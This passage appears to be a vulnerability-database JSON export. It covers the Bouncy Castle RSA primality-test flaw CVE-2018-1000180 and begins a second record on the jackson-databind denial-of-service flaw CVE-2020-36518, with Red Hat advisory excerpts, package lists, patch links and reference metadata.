rpm\neap7-resteasy-jsapi-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-json-p-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-multipart-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-spring-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-validator-provider-11-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-yaml-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-undertow-1.4.18-7.SP8_redhat_1.1.ep7.el6.noarch.rpm\neap7-wildfly-7.1.4-1.GA_redhat_1.1.ep7.el6.noarch.rpm\neap7-wildfly-javadocs-7.1.4-2.GA_redhat_1.1.ep7.el6.noarch.rpm\neap7-wildfly-modules-7.1.4-1.GA_redhat_1.1.ep7.el6.noarch.rpm\neap7-wildfly-naming-client-1.0.9-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-wildfly-transaction-client-1.0.4-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-wildfly-web-console-eap-2.9.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm\n\nx86_64:\neap7-wildfly-openssl-linux-1.0.6-14.Final_redhat_1.1.ep7.el6.x86_64.rpm\neap7-wildfly-openssl-linux-debuginfo-1.0.6-14.Final_redhat_1.1.ep7.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-12624\nhttps://access.redhat.com/security/cve/CVE-2018-8039\nhttps://access.redhat.com/security/cve/CVE-2018-10237\nhttps://access.redhat.com/security/cve/CVE-2018-10862\nhttps://access.redhat.com/security/cve/CVE-2018-1000180\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/?version=7.1\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.1/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBW3QPgdzjgjWX9erEAQgE4g//Wjtd+suEMLP7kOcaJMTUh1dTMowt7E/E\nQcS7tlzQCb5jXnnLEGaNzL9f5IS+MB0weir4Q9ju9Gcwf62x9F+F4H0jgeKtyKYA\niwItX1u8rG//t3kFP75Azcll0z1TjLR5I+XR1+WcMHGU3AlQhisXUVl3jcrnqWlP\nUZLq65lrTa4qt+8+QJSaKpAD8jTweEdWzvv8kAgYQt7uLZSpaClclsWemZuf5tap\ncojOFU9fFgUTiNNDYqSzfvHafrUpAoWIK5MKjF+3FJi0jfcMVuI+kuua0/gYwf4u\nopopohMKDY1MJVVfIxg3fl4YoIuT42u/ybsgD8ZXqbrJH6syjOptdPUf5VIr9tao\n/+oO2Ki5gwxPUke82U584h9klbb6DdIKcGH4+eQSe2ZkiLYmn5Yq3CvxDjKpkXfH\ngDJqeVpfQ717Aj0P499Rex/7ruwUrMx6Xx70HrNE8b2S3KsoN2bPqobA6OtPyx7w\nTmkpLyBHmn80PRS/Saejxm9nFU7bI3iliktcB2BcjnlUOWU1aqKJ2DJATTcHbxeK\nGaV765f0Xfnz4RyQUYuXyKRvNhic6D5tOzZ+09Fkm9rifHcRfPxSxEnGpBjWtcQx\nRlOs7J92EJ7v0FLnMIYzjb5QefUx+memaXcgngYoRMgqQqmpZlHOFOkTCIbi+C8x\njsOwwwJAmW4=eVEP\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-1000180"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
},
{
"db": "BID",
"id": "106567"
},
{
"db": "VULHUB",
"id": "VHN-119384"
},
{
"db": "VULMON",
"id": "CVE-2018-1000180"
},
{
"db": "PACKETSTORM",
"id": "148942"
},
{
"db": "PACKETSTORM",
"id": "152620"
},
{
"db": "PACKETSTORM",
"id": "148288"
},
{
"db": "PACKETSTORM",
"id": "148943"
},
{
"db": "PACKETSTORM",
"id": "148945"
}
],
"trust": 2.52
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-119384",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-119384"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-1000180",
"trust": 3.4
},
{
"db": "BID",
"id": "106567",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "152620",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.1406",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2340",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2561",
"trust": 0.6
},
{
"db": "JUNIPER",
"id": "JSA10939",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021042531",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148288",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "149229",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-119384",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-1000180",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148942",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148943",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148945",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-119384"
},
{
"db": "VULMON",
"id": "CVE-2018-1000180"
},
{
"db": "BID",
"id": "106567"
},
{
"db": "PACKETSTORM",
"id": "148942"
},
{
"db": "PACKETSTORM",
"id": "152620"
},
{
"db": "PACKETSTORM",
"id": "148288"
},
{
"db": "PACKETSTORM",
"id": "148943"
},
{
"db": "PACKETSTORM",
"id": "148945"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
},
{
"db": "NVD",
"id": "CVE-2018-1000180"
}
]
},
"id": "VAR-201806-0859",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-119384"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:19:00.883000Z",
"patch": {
"_id": null,
"data": [
{
"title": "DSA-4233",
"trust": 0.8,
"url": "https://www.debian.org/security/2018/dsa-4233"
},
{
"title": "BJA-694 cleaned up primality test",
"trust": 0.8,
"url": "https://github.com/bcgit/bc-java/commit/73780ac522b7795fc165630aba8d5f5729acc839"
},
{
"title": "BJA-694 minor tweak to avoid method signature change",
"trust": 0.8,
"url": "https://github.com/bcgit/bc-java/commit/22467b6e8fe19717ecdf201c0cf91bacf04a55ad"
},
{
"title": "Bouncy Castle BC Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80686"
},
{
"title": "Debian Security Advisories: DSA-4233-1 bouncycastle -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=4a57543e4dda2487f4c1ae8952d2b437"
},
{
"title": "Debian CVElist Bug Report Logs: bouncycastle: CVE-2018-1000180",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b99c874ecc8e69545f2285d1e06207f1"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.1.4 on RHEL7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182424 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.1.4 on RHEL 6 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182423 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182425 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.2.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182428 - Security Advisory"
},
{
"title": "Red Hat: Important: rhvm-appliance security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182643 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Application Runtimes Thorntail 2.4.0 security \u0026 bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20190877 - Security Advisory"
},
{
"title": "Red Hat: Important: Fuse 7.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182669 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM Sterling File Gateway is vulnerable to multiple issues due to Bouncy Castle",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3de0cda7adc2cd8a893e5cb9d7cdbe60"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2019",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b"
},
{
"title": "CyberSource Simple Order API for Java",
"trust": 0.1,
"url": "https://github.com/CyberSource/cybersource-sdk-java "
},
{
"title": "PHunter",
"trust": 0.1,
"url": "https://github.com/CGCL-codes/PHunter "
},
{
"title": "PHunter",
"trust": 0.1,
"url": "https://github.com/Anonymous-Phunter/PHunter "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-1000180"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-327",
"trust": 1.1
},
{
"problemtype": "CWE-310",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-119384"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
},
{
"db": "NVD",
"id": "CVE-2018-1000180"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.1,
"url": "http://www.securityfocus.com/bid/106567"
},
{
"trust": 2.5,
"url": "https://access.redhat.com/errata/rhsa-2019:0877"
},
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 2.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"trust": 2.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 2.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/errata/rhsa-2018:2423"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/errata/rhsa-2018:2425"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/errata/rhsa-2018:2428"
},
{
"trust": 1.8,
"url": "https://github.com/bcgit/bc-java/commit/22467b6e8fe19717ecdf201c0cf91bacf04a55ad"
},
{
"trust": 1.8,
"url": "https://github.com/bcgit/bc-java/commit/73780ac522b7795fc165630aba8d5f5729acc839"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20190204-0003/"
},
{
"trust": 1.8,
"url": "https://www.debian.org/security/2018/dsa-4233"
},
{
"trust": 1.8,
"url": "https://github.com/bcgit/bc-java/wiki/cve-2018-1000180"
},
{
"trust": 1.8,
"url": "https://www.bountysource.com/issues/58293083-rsa-key-generation-computation-of-iterations-for-mr-primality-test"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2018:2424"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2018:2643"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2018:2669"
},
{
"trust": 1.7,
"url": "https://www.bouncycastle.org/jira/browse/bja-694"
},
{
"trust": 1.3,
"url": "https://access.redhat.com/security/cve/cve-2018-1000180"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000180"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1588306"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-1000180"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10939"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-bouncy-castle-affects-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/79650"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-bouncy-castle-api-affect-ibm-license-metric-tool-v9/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-resilient-is-vulnerable-to-using-components-with-known-vulnerabilities/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021042531"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/152620/red-hat-security-advisory-2019-0877-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2340/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-bouncy-castle-vulnerabilities-affect-ibm-sterling-b2b-integrator/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2561/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-bouncy-castle-as-used-by-ibm-qradar-siem-contains-multiple-vulnerabilities-cve-2018-1000613-cve-2017-13098-cve-2018-1000180/"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10862"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-10862"
},
{
"trust": 0.3,
"url": "https://www.bouncycastle.org"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-8039"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-12624"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10237"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12624"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-8039"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-10237"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/?version=7.1"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.1/html-single/installation_guide/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-10912"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10912"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/327.html"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/./dsa-4233"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=60313"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/cybersource/cybersource-sdk-java"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=7.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product\\xcatrhoar.thorntail\u0026version=2.4.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-19360"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-14718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-10894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-14719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12022"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1114"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12023"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19360"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-19362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_application_runtimes/1/html-single/rhoar_thorntail_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1067"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12023"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12022"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11307"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1067"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11307"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-19361"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/bouncycastle"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_single_sign_on/?version=7.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=core.service.rhsso\u0026version=7.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-119384"
},
{
"db": "VULMON",
"id": "CVE-2018-1000180"
},
{
"db": "BID",
"id": "106567"
},
{
"db": "PACKETSTORM",
"id": "148942"
},
{
"db": "PACKETSTORM",
"id": "152620"
},
{
"db": "PACKETSTORM",
"id": "148288"
},
{
"db": "PACKETSTORM",
"id": "148943"
},
{
"db": "PACKETSTORM",
"id": "148945"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
},
{
"db": "NVD",
"id": "CVE-2018-1000180"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-119384",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2018-1000180",
"ident": null
},
{
"db": "BID",
"id": "106567",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "148942",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "152620",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "148288",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "148943",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "148945",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-1000180",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-06-05T00:00:00",
"db": "VULHUB",
"id": "VHN-119384",
"ident": null
},
{
"date": "2018-06-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-1000180",
"ident": null
},
{
"date": "2018-04-18T00:00:00",
"db": "BID",
"id": "106567",
"ident": null
},
{
"date": "2018-08-15T17:16:39",
"db": "PACKETSTORM",
"id": "148942",
"ident": null
},
{
"date": "2019-04-24T23:47:05",
"db": "PACKETSTORM",
"id": "152620",
"ident": null
},
{
"date": "2018-06-25T19:31:25",
"db": "PACKETSTORM",
"id": "148288",
"ident": null
},
{
"date": "2018-08-15T17:16:53",
"db": "PACKETSTORM",
"id": "148943",
"ident": null
},
{
"date": "2018-08-15T17:17:22",
"db": "PACKETSTORM",
"id": "148945",
"ident": null
},
{
"date": "2018-06-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-332",
"ident": null
},
{
"date": "2018-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006359",
"ident": null
},
{
"date": "2018-06-05T13:29:00.203000",
"db": "NVD",
"id": "CVE-2018-1000180",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2020-10-20T00:00:00",
"db": "VULHUB",
"id": "VHN-119384",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-1000180",
"ident": null
},
{
"date": "2019-07-17T07:00:00",
"db": "BID",
"id": "106567",
"ident": null
},
{
"date": "2021-06-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-332",
"ident": null
},
{
"date": "2018-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006359",
"ident": null
},
{
"date": "2025-05-12T17:37:16.527000",
"db": "NVD",
"id": "CVE-2018-1000180",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "Bouncy Castle BC and BC-FJA Cryptographic vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
}
],
"trust": 0.6
}
}
VAR-202203-1400
Vulnerability from variot - Updated: 2026-03-09 20:12jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. Description:
Red Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling 2039403 - CVE-2021-42392 h2: Remote Code Execution in Console 2040268 - CVE-2022-0225 keycloak: Stored XSS in groups dropdown 2060929 - CVE-2022-0866 wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled 2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr 2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2101942 - CVE-2022-2256 keycloak: improper input validation permits script injection 2115392 - CVE-2022-2668 keycloak: Uploading of SAML javascript protocol mapper scripts through the admin console
The following advisory data is extracted from:
https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3061.json
Red Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Solution:
For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
For Red Hat OpenShift Logging 5.5, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster LOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch LOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn't support multiple CAs LOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated. LOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types. LOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value LOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed LOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue LOG-3310 - [release-5.5] Can't choose correct CA ConfigMap Key when creating lokistack in Console LOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config
- Description:
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
Security Fix(es):
-
scala: deserialization gadget chain (CVE-2022-36944)
-
json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion) (CVE-2023-1370)
-
jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)
-
okhttp: information disclosure via improperly used cryptographic function (CVE-2021-0341)
-
netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
-
netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
-
jackson-databind: Possible DoS if using JDK serialization to serialize JsonNode (CVE-2021-46877)
-
netty: world readable temporary file containing sensitive data (CVE-2022-24823)
-
jettison: parser crash by stackoverflow (CVE-2022-40149)
-
jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)
-
jackson-databind: use of deeply nested arrays (CVE-2022-42004)
-
Red Hat A-MQ Streams: component version with information disclosure flaw (CVE-2023-0833)
-
jettison: memory exhaustion via user-supplied XML or JSON data (CVE-2022-40150)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update). Bugs fixed (https://bugzilla.redhat.com/):
2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data 2129809 - CVE-2022-36944 scala: deserialization gadget chain 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays 2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data 2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow 2154086 - CVE-2021-0341 okhttp: information disclosure via improperly used cryptographic function 2169845 - CVE-2023-0833 Red Hat A-MQ Streams: component version with information disclosure flaw 2185707 - CVE-2021-46877 jackson-databind: Possible DoS if using JDK serialization to serialize JsonNode 2188542 - CVE-2023-1370 json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)
- JIRA issues fixed (https://issues.jboss.org/):
ENTMQST-4107 - [KAFKA] MM2 connector task stopped and didn?t result in failed state ENTMQST-4541 - [PROD] Create RHSA erratum for Streams 2.4.0
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: jackson security update Advisory ID: RHSA-2023:2312-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:2312 Issue date: 2023-05-09 CVE Names: CVE-2020-36518 ==================================================================== 1. Summary:
